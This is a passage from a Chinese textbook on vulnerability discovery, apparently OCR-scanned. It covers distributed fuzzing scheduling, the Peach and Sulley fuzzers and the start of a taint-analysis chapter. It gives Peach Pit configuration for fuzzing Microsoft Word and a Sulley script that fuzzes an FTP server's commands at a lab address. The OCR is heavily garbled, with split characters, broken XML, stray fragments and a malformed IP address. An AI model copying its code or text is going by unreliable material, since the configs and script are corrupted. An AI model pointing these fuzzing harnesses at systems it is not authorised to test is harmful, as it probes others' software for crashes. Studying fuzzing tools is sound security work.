它 在 每 个 分 布 式 终端 启动 一 个 RPC 服务 器 ,然后 控制 中 心 利用 上 述 的 Client 类 与 RPC 
服务 器 建立 连接 ,从 而 实现 RPC 远程 调用 。 其 具体 方法 是 利用 Python 的 _getattr_ 方 
法 拦截 所 有 对 控制 中 心 本 地 不 存在 的 方法 的 调用 ,并 将 其 调用 信息 通过 RPC 协议 发 送 给 
分 布 式 终端 的 RPC 服务 器 ,然后 由 分 布 式 终端 执行 该 方法 。 这 一 框架 提供 了 一 种 透明 的 
机 制 ,使 得 控制 中 心 能 像 调 用 本 地 方法 一 样 调用 分 布 式 终端 上 的 方法 ,具有 良好 的 适用 性 
与 可 扩展 性 。 


652 分 布 式 模糊 测试 策略 


分 布 式 模糊 测试 要 求 各 分 布 式 终端 执行 不 同 的 测试 用 例 , 但 是 应 该 为 各 分 布 式 终端 
制定 统一 的 策略 文件 ,一 个 主要 的 原因 是 ,如 果 每 个 分 布 式 终端 采用 不 同 的 测试 策略 , 当 
分 布 式 终端 的 数量 由 于 故障 、 硬 件 资源 变化 等 原因 发 生变 化 ,就 要 为 每 个 分 布 式 终端 生成 
新 的 策略 文件 。 

因此 ,一 种 可 行 的 分 布 式 模糊 测试 策略 是 采用 统一 描述 ,然后 各 分 布 式 终端 根据 自己 
的 序号 生成 与 其 他 分 布 式 终端 不 同 的 测试 用 例 。 一 个 简单 的 方法 是 ,每 个 分 布 式 终端 生 
成 完全 一 样 的 测试 用 例 序 列 ,然后 选择 序号 模 终端 数量 的 值 与 节点 序号 相等 的 测试 用 例 
输入 给 测试 对 象 。 这 种 方法 简单 易 行 ,并 且 由 于 数据 生成 过 程 的 消耗 远 少 于 测试 对 象 执 
行 过 程 ,其 在 数据 生成 过 程 中 消耗 的 额外 时 间 也 是 能 够 接受 的 。 

考虑 到 模糊 测试 系统 中 硬件 资源 的 差异 ,各 分 布 式 终端 的 执行 速度 也 存在 差异 ,让 执 
行 速度 更 快 的 终端 执行 更 多 的 测试 用 例 能 提高 模糊 测试 总 体 的 效率 。 对 上 述 方法 一 个 最 
直观 的 改进 是 让 一 个 终端 拥有 多 个 序号 ,并 且 拥 有 的 序号 数量 与 分 布 式 终端 的 数量 成 
IER. 

至 此 ,我 们 设计 的 分 布 式 任务 分 配 机 制 能 够 运行 在 真实 的 模糊 测试 系统 上 了 。 下 面 
将 介绍 一 种 基于 该 机 制 的 测试 数据 生成 方法 。 首 先 讨论 测试 用 例 包含 的 字段 数量 是 固定 
的 情况 。 以 文件 为 例 , 一 个 文件 及 个 字段 {ki Hoe) EF EGE€ Nin D ,模糊 
测试 策略 选择 m; 个 值 作为 样本 ,于 是 测试 用 例 就 是 这 些 字段 可 能 取 值 的 全 组 合 , 我 们 的 
目标 就 是 为 这 些 可 能 的 组 合 方式 编号 。 当 所 有 分 布 式 节点 都 采用 同样 的 方式 给 测试 用 例 
编号 后 ,对 测试 任务 进行 分 配 与 调度 就 十 分 方便 了 。 

对 e; ,我 们 依次 对 mi 个 值 进行 编号 ji (j; ER, 一 1 二 ji 二 m), 将 其 表示 为 长 度 为 
| log m; 的 二 进 制 数 ,然后 将 这 些 二 进 制 数 拼接 起 来 得 到 测试 用 例 的 序号 ja lje le due 
在 得 到 测试 用 例 的 序号 后 ,可 以 采用 类 似 于 IP. 地 址 的 方式 对 测试 用 例 进行 分 段 配 置 , 实 
现 分 布 式 模糊 测试 策略 。 

上 述 方法 还 存在 一 个 微妙 的 问题 ,如 果 分 布 式 终端 直接 依次 按 测试 用 例 序 号 生成 测 
试用 例 ,会 出 现 某 一 段 测试 用 例 之 间 的 差别 十 分 小 的 情况 。 如 果 考 虑 到 一 个 字段 可 能 有 
多 个 取 值 都 能 触发 异常 的 情况 ,那么 采用 随机 的 方式 选择 测试 用 例 ,能 有 效 降低 首 轮 命中 
次 数 。 一 个 可 行 的 方法 是 对 测试 用 例 的 序号 的 二 进 制 位 做 置换 运算 ,在 此 基础 上 再 依次 
选择 测试 用 例 。 
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模糊 测试 是 一 个 持续 时 间 很 长 的 工作 ,在 这 一 过 程 中 计算 资源 可 能 由 于 各 种 原因 会 
增加 或 减少 ,或 者 分 布 式 终端 的 执行 速度 发 生 了 变化 ,此 时 需要 在 各 分 布 式 终端 对 模糊 测 
试 任务 进行 调度 。6.5. 2 节 的 分 布 式 模糊 测试 策略 提出 了 一 种 测试 用 例 进行 编号 的 方 
法 ,通过 该 方法 控制 中 心 与 分 布 式 终端 可 以 为 测试 用 例 计算 一 个 全 局 一 致 的 编号 ,这 个 编 
号 可 以 作为 模糊 测试 任务 调度 的 依据 。 

分 布 式 模糊 测试 策略 提出 了 按 执行 速度 的 比例 划分 测试 用 例 的 方法 ,在 此 基础 上 对 
其 进行 改进 ,使 其 能 够 动态 适应 模糊 测试 系统 计算 资源 的 变化 以 及 分 布 式 终端 执行 速度 
的 变化 。 一 个 直观 的 改进 方式 是 ,将 整个 模糊 测试 过 程 划分 为 许多 阶段 ,每 完成 一 个 阶段 
的 测试 ,控制 中 心 会 计算 根据 各 分 布 式 终端 的 执行 速度 计算 其 占有 测试 用 例 的 权 值 ,并 在 
此 时 加 入 新 的 计算 资源 ,或 剔除 已 失效 的 计算 资源 。 考 虑 到 计算 资源 失效 后 ,其 执行 状态 
与 以 前 执行 保存 的 结果 数据 没 能 保存 ,因此 需要 将 其 这 一 阶段 的 任务 分 配给 其 他 终端 去 
执行 。 图 6-16 简要 说 明了 动态 适应 的 分 布 式 调 度 机 制 。 


一 一 一 调度 参数 {[i,j], sum,step} 
pA 
AT i 
d | 
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图 6-16 动态 适应 的 分 布 式 调度 机 制 


6.6 典型 工具 与 案例 


目前 的 模糊 测试 工具 种 类 很 多 ,有 通用 的 ,也 有 针对 某 些 特定 软件 的 ,有 主要 注重 框 
架 的 ,也 有 关注 测试 效率 的 ,有 开源 的 ,也 有 商业 的 。 表 6-1 列举 了 几 种 常见 的 开源 模糊 
测试 工具 。 





表 6-1 典型 的 开源 模糊 测试 工具 列表 
产品 名 称 特点 描述 


ANTIPARSER | 一 个 用 Python 语言 编写 的 API, 被 设计 用 来 帮助 生成 随机 数据 


构成 Dfuz 的 基本 组 成 部 分 包括 数据 函数 ,列表 、 选 项 \ 协 议 以 及 变量 。 这 些 不 同 
Dfuz 的 组 成 部 分 被 用 来 定义 一 组 规则 集 , 模 糊 测 试 引擎 可 以 对 这 些 规则 集 进行 解析 以 
生成 和 传输 数据 
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产品 名 称 特点 描述 

SPIKE 能 自动 地 更 新 每 个 字段 的 值 ,就 好 像 实 施 了 不 同 的 变异 操作 一 样 。 该 框架 的 2. 9 
版 包含 一 个 大 约 有 700 个 可 诱发 错误 的 启发 式 攻 击 列表 

Peach 是 一 个 采用 Python 语言 编写 的 跨 平台 的 模糊 测试 框架 ,该 框架 提供 了 一 些 基 本 的 
构件 以 创建 新 的 模糊 器 ,包括 生成 器 ,转换 器 ,协议 ,发行 器 以 及 群 组 

GPF 通过 一 些 模式 来 提供 相关 功能 ,这 些 模式 包括 PureFuzz, Convert, GPF (ERR), 
Pattern Fuzz 以 及 SuperGPF。 这 些 模式 针对 不 同 的 应 用 场景 ,有 较 好 的 适用 性 

Kütadaté 主要 目标 是 缩减 整个 模糊 测试 的 输入 空间 ,并 降低 其 复杂 性 ,以 更 加 有 效 地 关注 
可 能 会 导致 发 现 安全 漏洞 的 那些 协议 的 领域 

Sulley 一 个 模糊 器 开发 和 模糊 测试 框架 , 它 是 由 多 个 可 扩展 的 构件 组 成 的 。 该 框架 的 目 
标 是 : 不 仅 简化 数据 的 表示 ,而且 简化 数据 的 传输 以 及 对 目标 的 监视 





下 面 从 框架 原理 和 使 用 方法 两 个 方面 对 其 中 的 代表 性 工具 Peach 和 Sulley 进行 
介绍 。 
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Peach 是 一 个 功能 强大 的 模糊 测试 工具 。Peach 2 是 开源 的 ,使 用 的 语言 包含 
Python,C 语言 等 。Peach 3 有 开源 版 本 ,也 有 商业 的 版 本 ,其 中 开源 的 版 本 主要 用 C# 写 
成 。Peach 提出 了 一 种 称 为 Pit 的 脚本 文件 ,Pit 文件 可 以 与 种 子 文件 一 同 使 用 ,对 文件 等 
复杂 数据 有 很 好 的 描述 能 力 。Peach 的 基本 功能 结构 如 图 6-17 所 示 。 


(Publisher) 
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Peach 引擎 Peach 代理 











图 6-17 Peach 的 基本 结构 


其 中 Publisher 就 是 测试 数据 生成 模块 ,负责 根据 Pit 文件 与 种 子 文件 创建 测试 用 
例 ;Fuzzer 引擎 与 代理 管理 模块 则 是 环境 控制 模块 ,负责 管理 测试 对 象 及 其 运行 环境 ,并 
与 测试 对 象 进行 交互 ;Logger 则 是 状态 监控 模块 ,通过 Peach 内 置 的 探 针 提取 测试 状态 
信息 。 


Sos MU 


下 面 以 Microsoft Word 为 例 , 介 绍 利 用 Peach 生成 测试 用 例文 件 , 发 掘 软件 漏洞 的 
过 程 , 其 步骤 如 下 : 

(1) 安装 所 需 环境 软件 。 以 Peach 3. 1. 124. 0 版 本 为 例 ,除了 Peach 软件 之 外 ,还 需 
要 安装 WinDbg 和 .NET 框架 。 

(2) 配置 Pit 文件 中 的 数据 格式 。 需 要 配置 种 子 文件 的 路 径 和 数据 变异 字段 的 规则 。 
图 6-18 给 出 了 种 子 文件 的 配置 代码 片段 ,其 中 的 fileName 字段 配置 种 子 文件 的 路 径 , 样 
例 中 给 出 了 相对 路 径 下 的 seed. doc 文件 ,此 外 可 以 使 用 绝对 路 径 。 变 异 规则 可 以 根据 需 
求 进行 定义 。 首 先 使 用 offvis 工具 解析 出 样本 文件 格式 ,如 图 6-19 所 示 。 然 后 指定 要 变 





<!-- This is our simple doc state model --» 
«StateModel name-"TheState" initialState-"Initial"'» 
«State name-"Initial"» 


<!-- Write out our .doc file --» 
XAction type-"output"» 
«DataModel ref-"D0C"/» 


<!-- This is our sample file to read in --» 
«/Action» 
«Action types-"close"/» 
«!-- Launch the target process --» 
«Action type-"call" method-"LaunchViewer" publisher-"Peach.Agent" /> 
«/State» 
«/StateModel» 











图 6-18 Peach 种 子 文件 配置 





Name Value Offset See Type 
C) OLESSHeader 0 512 OLESSHEADER 
| Fe 208 207 17 224 161 177 26 225 0 8 Dataltem_ UByteArray 
cdNul 8 16 asp 
| veinor 62 24 2 Dataltem Ulnt16 
VerDl 3 26 2 Dataltem Ulnt16 
| -ByteOrder 65534 28 2 Dataltem Ulnt16 
SectorShift 9 30 2 Dataltem Uint16 
| L-MniSecshift 6 32 2 Dataltem Ulnt16 
Reserved. 0 34 2 Dataltern Ulnt16 
l| Reserved2 0 36 4 Dataltem Ulnt32 
NumDirSects 0 40 4 Dataltem Ulnt32 
| NumFatsects 14 44 4 Dataltem_Uint32 
Drsectl 1673 48 4 SECTOR 
| -Tansactso 0 52 4 Dataltem, Ulnt32 
|-MiniStiMax 4096 56 4 Dataltem_Uint32 
| 时 MnFatsectl 1675 60 4 SECTOR 
= NumMiniFatSects 1 64 4 Dataltem Ulnt32 
| 上 Datsect FAT_ENDOFCHAIN 68 4 SECTOR 
$: NumDifatSects 0 72 4 Dataltem Ulnt32 
| GDrat[109] 76 436 List<SECTOR> 
由 ;FAT[1792] 849920 7168 List<SECTOR> 
外 .MinFAT[128] 858112 512 List<SECTOR> 
Directoryntries[6] 857088 1024 List<OLESSDrectoryEntry> 


图 6-19 DOC 文 件 格式 
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异 的 字段 和 规则 ,其 他 数据 格式 不 变 , 如 图 6-20 所 示 , 其 中 ,DOC 是 数据 模型 的 模型 名 
称 ,Blob 定义 基本 数据 块 ,类 型 为 hex, 长 度 为 40B,mutable 属性 为 false 指定 这 个 字段 不 
变异 ,Number 指定 为 整 型 数据 , size 指定 比特 数 ,32b 为 4B, signed 标志 为 有 符号 数 ， 
false 属性 说 明 相反 。 样 例 指定 了 8B 的 变异 规则 , 若 需 要 更 多 的 变异 规则 ,可 以 采用 类 似 
的 方式 添加 。 另 外 ,通过 ref 可 以 引用 其 他 的 数据 模型 ,这 些 数据 模型 可 以 在 当前 Pit 文 
件 进行 定义 。 
<DataModel name="DOC"> 

<Blob name="0LESSHeaderPart" valueType="hex" length="40" matable="false" /> 

<Number name ="NumDirSects" valueType ="hex" signed="true" size=" 

«Number name -"NumFatSects* valueType ="hex" signed="false" size="32"/> 

4Blob namez'datal" valueType="hex" length-"52288" mutable-"false'/» 


«Block ref-"SEPX[0]" /> 
x/DataModel» 





图 6-20 数据 格式 定义 


(3) 配置 Pit 文件 中 的 控制 对 象 , 如 图 6-21 所 示 。 其 中 , 监控 类 型 为 
WindowsDebugger, 用 于 捕获 触发 的 异常 ,CommandLine 配置 了 测试 对 象 的 启动 命令 , 包 
含 程序 路 径 和 打开 的 测试 对 象 文件 路 径 , NoCpuKill 指定 在 程序 暂停 运行 时 终止 进程 ， 
WaitForExitTimeout 指定 程序 启动 多 少 毫 秒 后 终止 程序 ,这 两 项 定义 了 单 次 测试 的 终止 
条 件 , 只 要 有 一 个 条 件 满足 就 会 终止 。 


«Agent name='WinAgent"> 
<Ħonitor class="WindowsDebugger"> 


-- The command line to run. Notice the filename provided matched up 
to what is provided below in the Publisher configuration — 
<Param name*'CommandLine* value="C:\Program Files\Microsoft Office\root \orrice16\W DMORD EXE fuzzed.doc" /> 
-- This parameter will cause the debugger to vait for an action-call in 
the state model with a methode"StartMPlayer" before running 
program. 


<param namee'StartOnCall* valuee'LaunchViewer* /> 
~ «Param name-"ProcessName" valuee"EXCEL.EXE" /> --» 


-- This parameter vill cause the monitor to terminate the process 
once the CPU usage reaches zero. 


<Param name-'NoCpuKill* value="true"/> 






«Param FaultOnEarlyl t» 
<Param name-"WaitForExitTimeout" =*10000*/> 
«/Honitor» 


图 6-21 控制 对 象 配置 


(4) 配置 Pit 文件 中 的 环境 维护 操作 。 由 于 Word 程序 在 开启 文件 失败 后 会 在 注册 
表 中 记录 这 些 异常 ,下 次 打开 时 弹出 对 话 框 ,由 用 户 选 择 是 否 以 安全 模式 开启 ,阻碍 了 测 
试 运行 。 通 过 配置 可 以 在 每 次 测试 后 清理 注册 表 , 消 除 这 项 影响 ,如 图 6-22 ros. 





NS-1-5-21-2384714578-2429604038-1719562846-1007\Software\ticroscft\0£fice\16. 0\Word\nesilienoy\StartupTteme"/> 


orosoft\0ffice\16.0\Word\Resiliency\DisahledIteme"/> 


图 6-22 ”清理 注册 表 配 置 


CO 配置 监控 对 象 与 监控 异常 类 型 ,如 图 6-23 Bros ,其 中 的 WINWORD. EXE 为 监 
控 对 象 进程 名 ,PageHeap 为 监控 内 存 页 面 异常 的 发 生 。 


BOS RWX 








«Monitor cl "PageHeap" 
«Param 7"Executable" value-"WINWORD.EXE"/» 
«/Monitor» 


图 6-23 ”监控 对 象 配置 


(6) 启动 Peach 开始 Fuzz, 如 图 6-24 所 示 。Peach. exe 是 挖掘 软件 程序 ,sample. xml 
是 配置 文件 ,内 部 定义 了 数据 模型 .挖掘 对 象 监 控 类 型 等 核心 参数 ,-p 是 启用 并 行 功能 ， 
100 指定 使 用 100 个 并 行 节点 ,3 指明 本 节点 为 第 3 个 节点 分 量 。 最 后 生成 的 结果 在 logs 
文件 夹 下 ,status. txt 记录 了 运行 起 止 时 间 ,并 每 隔 100 个 样本 记录 一 次 时 间 , 另 外 ,异常 
样本 也 会 记录 在 该 文件 夹 的 子 目 录 下 。 以 ID 命名 的 文件 夹 下 记录 了 崩溃 相关 信息 。 如 
图 6-25 所 示 ,其 中 的 * .bin 文件 为 样本 文件 , WinAgent. Monitor. * 文件 记录 了 毅 溃 的 
类 型 及 调试 信息 。 














6-24 Peach 启动 
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图 6-25 异常 样本 记录 
Peach 是 一 个 成 熟 的 工具 ,为 很 多 软件 提供 了 大 量 种 子 文件 以 及 相应 的 Pit 文件 ,有 
很 好 的 适用 性 与 效率 。 但 是 部 分 种 子 文件 与 Pit 文件 是 需要 付费 的 ,同时 其 结构 比较 复 
杂 , 要 在 其 基础 上 进行 扩展 与 定制 开发 比较 困难 。 
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Sulley 是 一 个 分 布 式 模糊 测试 框架 , 它 通 过 RPC 协议 实现 了 一 套 分 布 式 控制 机 制 ， 
时 给 出 了 一 些 基础 数据 结构 的 数据 生成 方法 ,并 在 一 定 程度 上 支持 复杂 数据 结构 的 数 
生成 。 用 户 可 以 方便 地 在 这 一 框架 的 基础 上 定制 自己 需要 的 功能 ,或 者 对 其 进行 全 面 
展 ,使 之 成 为 一 个 真正 通用 的 模糊 测试 工具 。Sulley 的 基本 结构 如 图 6-26 所 示 。 
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Sulley 框 架 
图 6-26 Sulley 的 基本 结构 


其 中 ,Primitives 和 Logos 模 组 定义 了 各 基础 数据 类 型 的 数据 生成 方法 ,Blocks 定义 
了 复杂 数据 类 型 的 表示 方法 与 数据 生成 方法 。 用 户 通 过 这 些 数据 结构 定义 协议 的 交互 过 
程 ,并 用 图 进行 表示 。Session 管理 器 对 图 进行 解析 ,并 与 测试 对 象 进行 数据 交互 。 代 理 
提供 了 一 些 对 分 布 式 终端 性 能 、 网 络 流量 .进程 进行 监控 的 方法 。 

本 节 以 FTP 服务 器 为 例 , 介 绍 Fuzz 的 使 用 方法 。 在 192. 168. 1. 233 上 部 署 warftp 
软件 ,并 将 其 端口 设置 为 21。 编 写 如 下 Sulley 脚本 : 


from sulley import * 
s_initialize ("user") 
s_static ("USER") 

s delim(" ") 

s string("justin") 

s static("NrWn") 

s initialize("pass") 
s static("PASS") 

s delim(" ") 

s string("justin") 
s_static("\r\n") 

s initialize ("cwd") 
s_static ("CWD") 

s delim(" ") 


fom enu se 


s string("c: ") 
s_static("\r\n") 

S initialize ("dele") 

s_static ("DELE") 

s delim(" ") 

s string("c:Wtest.txt") 

S static("\r\n") 

5 initialize("mdtm") 

S static("MDTM") 

s delim(" ") 

s string("C:Wboot.ini") 

s static("\r\n") 

S initialize("mkd") 

S static("MKD") 

s delim(" ") 

s string("C:W TESTDIR") 

s static("\r\n") 
sSess-sessions.session(session filename- "warftpd.session") 
target- sessions.target ('192.1268.1.233',21) 
sess.add target (target) 

sess.connect (s get ("user")) 

sess.connect (s get ("user"), s get ("pass")) 
sess.connect (s get ("pass"), s get ("cwd")) 
sess.connect (s get ("pass"), s get ("dele")) 
sess.connect (s get ("pass"), s get ("mdtm")) 
sess.connect (s_get ("pass"), s get ("mkd") ) 


fuzz() 


其 中 ,sess. connect 方法 将 协议 交互 的 相 邻 两 个 过 程 连接 起 来 ,告诉 fuzz 方 法 如 何 处 理 协 
议 多 次 交互 过 程 。s_initialize 方法 创建 一 个 新 的 数据 结构 ,并 给 其 命名 。s_static 为 数据 
结构 添加 一 个 常量 字段 ,s_delim 为 数据 结构 添加 分 隔 符 字 段 ,s_string 为 数据 结构 添加 
字符 串 字 段 。sessions. session 创建 一 个 测试 过 程 ,sess. add. target 为 测试 过 程 配置 测试 
目标 。 

Sulley 提供 了 一 个 很 好 的 可 扩展 的 分 布 式 框架 ,并 为 网 络 模糊 测试 提供 了 较 好 的 支 
持 。 但 是 它 支持 的 协议 有 限 ,更 多 的 协议 需要 用 户 自 己 添加 ,同时 它 对 文件 Fuzz 的 支持 
能 力 有 限 。 
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污点 传播 分 析 


污点 分 析 (taint analysis) 是 一 种 软件 数据 流 分 析 技 术 , 该 技术 通过 标记 程序 中 的 数 
据 ( 外 部 输入 数据 或 内 部 数据 ) 为 污点 ,跟踪 程序 处 理 污 点 数据 的 内 部 流程 ,进而 帮助 人 们 
进行 深入 的 程序 分 析 和 理解 。 近 年 来 ,污点 分 析 逐 渐 成 为 软件 安全 分 析 领域 中 最 重要 的 
基础 方法 之 一 ,研究 人 员 利 用 它 已 经 在 恶意 代码 检测 ,软件 漏洞 挖掘 以 及 用 户 隐 私 保护 等 
方面 取得 了 令 人 瞩目 的 成 绩 。 

本 章 围 绕 污点 分 析 将 安排 如 下 内 容 : 首先 ,介绍 污点 分 析 的 发 展 过 程 、 主 要 分 类 以 及 
相关 的 应 用 领域 ;其 次 ,通过 简单 例子 阐述 污点 分 析 的 工作 原理 ;再 次 ,针对 污点 分 析 中 涉 
及 的 主要 方法 展开 详细 描述 ;最 后 ,介绍 典型 污点 分 析 系 统 实现 及 典型 应 用 案例 。 





7.1 概 述 


7.1.1 发 展 简 史 


1976 年 , 普 渡 大 学 的 D. E. Denning 首次 提出 了 信息 流 模型 的 概念 ,将 信息 流 定义 为 
一 种 形式 化 描述 程序 中 数据 处 理 和 传递 的 方法 。 而 污点 分 析 正 是 在 信息 流 理论 的 基础 
上 ,通过 将 程序 外 部 输入 或 内 部 数据 " 绑 定 ”污点 标签 的 方式 ,实现 了 更 加 细 粒 度 的 程序 分 
析 。 根 据 “ 绑 定 ” 机 制 的 不 同 实现 ,研究 人 员 提 出 了 静态 污点 分 析 和 动态 污点 分 析 , 下 面 将 
围绕 这 两 种 方法 的 发 展 过 程 进行 介绍 。 

静态 污点 分 析 方 法 中 最 具 代表 性 的 工作 是 1999 年 由 加 州 伯克利 大 学 的 J. S. Foster 
等 人 提出 的 类 型 修饰 符 理论 (Theory of Type Qualifier) ,其 基本 思想 是 为 程序 源码 中 的 
变量 、 函 数 等 符号 增加 额外 的 类 型 修饰 符 ,并 提取 和 分 析 程 序 代 码 中 全 部 类 型 修饰 符 所 形 
成 的 修饰 符 信 息 流 ,从 而 帮助 人 们 快速 理解 程序 的 语义 信息 。 正 是 借助 该 方法 ,J]. S. 
Foster 团队 在 2001 年 提出 了 一 套 面向 C 程序 中 的 格式 化 字符 串 漏洞 挖掘 方 法 ,并 在 此 
基础 上 实现 了 著名 的 开源 检测 工具 CQual。 此 外 ,在 2003 年 ,加 州 伯克利 大 学 的 P. 
Broadwell 等 人 在 类 型 修饰 理论 的 基础 上 提出 了 一 种 能 够 有 效 防止 用 户 敏感 信息 泄露 的 
安全 防护 方法 ,并 通过 扩展 CQual 实现 了 相关 的 原型 系统 一 一 Scrash。 

尽管 静态 污点 分 析 方 法 已 经 在 软件 安全 领域 展现 了 较为 显著 的 成 效 ,但 是 考虑 到 静 
态 分 析 方法 在 实际 使 用 中 的 复杂 性 (例如 典型 的 路 径 爆 炸 问题 ) ,使 得 该 方法 难以 运用 在 
实际 商业 应 用 或 者 大 规模 程序 的 分 析 中 ,因此 污点 方法 在 程序 静态 分 析 领 域 并 没有 得 到 
长 足 发 展 。 而 与 此 同时 , 随 着 程序 动态 插 装 技术 和 工具 的 不 断 涌现 ,人 们 发 现 将 污点 方法 
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应 用 在 程序 动态 分 析 方 面 竟然 能 够 取得 惊人 的 效果 。 其 中 ,早期 代表 性 工作 是 在 2004 年 
和 2005 年 ,由 斯 坦 福 大 学 的 本 . Chow ARAH < 梅 隆 大 学 的 J. Newsome 分 别 在 动态 污 
点 分 析 方法 的 基础 上 提出 了 分 析 敏 感 数据 生命 周期 的 TaintBochs 系统 和 检测 恶意 代码 
攻击 的 TaintCheck 系统 ,这 两 项 工作 不 仅 向 人 们 展示 了 动态 污点 分 析 方 法 的 强大 能 力 ， 
同时 从 某 种 程度 上 说 ,这 两 项 工作 正式 揭 开 了 动态 污点 分 析 方 法 快速 发 展 的 序幕 。 

据 统计 ,2004 一 2015 年 间 , 国 际 上 和 动态 污点 分 析 相 关 的 研究 成 果 多 达 百 余 项 ,而 其 
中 以 加 州 伯克利 大 学 的 D. Song 团队 最 为 突出 (上 文 所 述 的 TaintCheck 系统 正 是 由 
D. Song 在 卡 内 基 ，… 梅 隆 任 教 期 间 指导 学 生 J. Newsome 完成 的 ) 。 该 团队 将 动态 污点 分 
析 方 法 应 用 在 了 众多 的 实际 场景 中 ,例如 ,面向 恶意 代码 检测 和 分 析 的 Panorama, ifti [6] d 
制 流动 态 污点 分 析 的 DTA 十 十 以 及 面向 网 络 协议 逆向 的 Polyglot。 除 D. Song 团队 以 
外 ,2010 年 由 宾夕法尼亚 大 学 的 W. Enck、 杜 克 大 学 的 P. Gilbert 以 及 英特尔 实验 室 的 
B. G. Chun 合作 完成 了 著名 开源 系统 一 一 TaintDroid, 该 工作 不 仅 开创 性 地 将 动态 污点 
分 析 方 法 应 用 在 智能 手机 终端 中 的 隐私 保护 问题 上 ,同时 该 工作 还 成 功 发 表 在 计算 机 系 
统领 域内 的 顶级 会 议 OSDI。 最 后 ,荷兰 阿姆斯特丹 大 学 的 H. Bos 团队 、 美 国 雪 城 大 学 的 
H. Yin 团队 以 及 新 加 坡 国立 大 学 的 Z. Liang 团队 均 在 动态 污点 分 析 基 础 方法 、 实 用 化 系 
统 以 及 相关 应 用 方面 取得 了 突出 成 绩 。 
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图 7-1 污点 分 析 方法 的 发 展 及 相关 应 用 
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如 图 7-1 所 示 ,动态 污点 分 析 方 法 在 恶意 代码 检测 、 软 件 漏洞 挖掘 以 及 敏感 数据 泄露 
分 析 方 面 均 取得 了 长 足 的 发 展 , 本 节 将 针对 每 一 个 应 用 领域 中 的 代表 性 工作 进行 介绍 。 

1. 恶意 代码 检测 方面 

通过 借助 动态 污点 分 析 , 可 以 实时 跟踪 外 部 数据 在 程序 内 部 的 异常 使 用 行为 ,而 对 于 
大 部 分 恶意 代码 来 说 ,其 自身 往往 需要 依赖 特定 的 外 部 数据 作为 攻击 载体 ,因此 ,通过 污 
点 分 析 来 跟踪 外 部 数据 是 否 被 用 来 作为 某 些 异常 行为 的 输入 ,可 以 有 效 地 检测 出 系统 中 
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是 否 存 在 蠕虫 .木马 等 恶意 代码 。 

2005 E, FAH < HKZ H J. Newsome 等 人 正 是 在 研究 针对 CodeRed, Slammer 
等 蠕虫 检测 的 过 程 中 提出 了 “动态 污点 分 析 ” 的 概念 ,并 借助 程序 动态 插 装 工具 Valgrind 
实现 了 TaintCheck 系统 原型 。 该 工作 的 核心 思想 是 将 来 自 网 络 的 数据 包 标 记 为 污点 , 借 
助 指令 插 装 技术 分 析 每 一 条 执行 语句 所 对 应 的 污点 传播 过 程 ,进而 通过 污点 误 用 规则 检 
测 出 可 能 造成 攻击 的 情况 。 在 具体 实现 过 程 中 ,TaintCheck 系统 检测 各 种 污点 数据 被 恶 
意 代 码 使 用 的 情况 ,例如 被 作为 跳 转 目标 地 址 、 格 式 化 字符 串 参 数 以 及 关键 系统 调用 参数 
等 。 由 于 该 系统 在 检测 格式 化 字符 串 ,缓冲 区 溢出 、 多 次 释放 以 及 堆 结 构 破坏 等 恶意 代码 
的 常用 技术 方面 取得 了 很 好 的 效果 ,因此 也 成 为 动态 污点 分 析 应 用 在 恶意 代码 检测 方面 
最 具 代 表 性 的 工作 之 一 。 

2. 软件 漏洞 挖掘 方面 

尽管 现 有 模糊 测试 技术 已 经 被 证 明 能 够 成 功 地 发 现 软件 漏洞 ,但 在 构造 输入 样本 过 
程 中 由 于 无 法 理解 数据 自身 含义 以 及 难以 满足 程序 输入 要 求 , 因 此 在 实际 使 用 过 程 中 往 
往 会 产生 大 量 无 效 或 者 不 会 触发 程序 错误 的 输入 ,从 而 使 得 漏洞 挖掘 的 效率 较 低 。 而 考 
虑 到 动态 污点 分 析 在 细 粒 度 跟 踪 数 据 处 理 以 及 理解 程序 行为 语义 等 方面 的 优势 ,研究 人 
员 提 出 了 基于 污点 分 析 的 智能 型 模糊 测试 方法 , 相 比 传统 技术 方案 ,由 于 具备 数据 格式 以 
及 程序 行为 语义 的 感知 能 力 ,避免 了 无 效 数 据 的 生成 ,从 而 很 大 程度 上 提高 了 软件 漏洞 的 
挖掘 效率 。 

2010 年 ,北京 大 学 的 王 铁 磊 博士 首次 提出 了 一 种 基于 污点 分 析 的 模糊 测试 方法 ,该 
方法 主要 是 借助 污点 分 析 来 解决 人 们 利用 传统 模糊 测试 技术 进行 漏洞 挖掘 时 难以 绕 过 的 
程序 校 验 和 问题 。 具 体 来 说 ,根据 数据 完整 性 检测 的 机 制 ,通常 会 将 整个 数据 项 进行 复杂 
计算 后 和 数据 项 中 的 校 验 和 进行 比较 ,如 果 计算 结果 和 校 验 和 一 致 , 则 表明 数据 是 完整 
的 ,和 否则 无 法 通过 检测 。 结 合 该 机 制 的 底层 代码 实现 可 以 发 现 ,最 终 的 校 验 和 验证 都 是 通 
过 某 种 条 件 跳 转 指令 来 实现 的 ,因此 TaintScope 系统 对 所 有 条 件 跳 转 指 令 执 行 时 所 依赖 
的 标志 寄存 器 进行 污点 状态 检查 ,如 果 发 现 该 寄存 器 在 指令 跳 转 之 前 已 经 被 超出 一 定数 
量 的 污点 数据 感染 , 则 将 其 作为 检测 点 候选 项 。 当 然 仅 仅 发 现 这 些 校 验 和 检测 点 并 不 能 
真正 实现 软件 漏洞 的 挖掘 ,还 需要 借助 符号 执行 和 模糊 测试 等 关键 技术 ,但 这 些 并 非 本 章 
关注 的 重点 ,对 这 些 技术 感 兴趣 的 读者 可 以 进一步 参看 相关 文献 。 

3. 敏感 数据 泄露 分 析 方面 

随 着 信息 化 社会 的 到 来 ,人 们 将 更 多 的 敏感 和 隐私 数据 存储 于 计算 机 中 ,但 对 于 这 些 
重要 数据 是 否 真 的 被 合理 存储 以 及 是 否 存 在 泄露 的 可 能 ,人 们 往往 难以 给 出 准确 回答 。 
然而 ,通过 动态 污点 分 析 技术 ,研究 人 员 可 实现 细 粒 度 的 敏感 数据 跟踪 能 力 , 分 析 其 在 程 
序 运行 时 的 实际 处 理 过 程 ,从 而 能 够 准确 回答 敏感 数据 是 否 存在 被 泄露 的 可 能 。 

斯 坦 福 大 学 的 J. Chow 等 人 最 早 将 动态 污点 分 析 方 法 应 用 在 敏感 数据 分 析 方面 ,其 
在 2004 年 所 提出 的 TaintBochs 也 是 最 早 使 用 全 系统 化 虚拟 技术 的 动态 污点 分 析 系 统 。 
该 工作 的 核心 思想 是 利用 硬件 层 污 点 标记 的 方法 跟踪 敏感 数据 在 全 系统 范围 内 的 处 理 情 
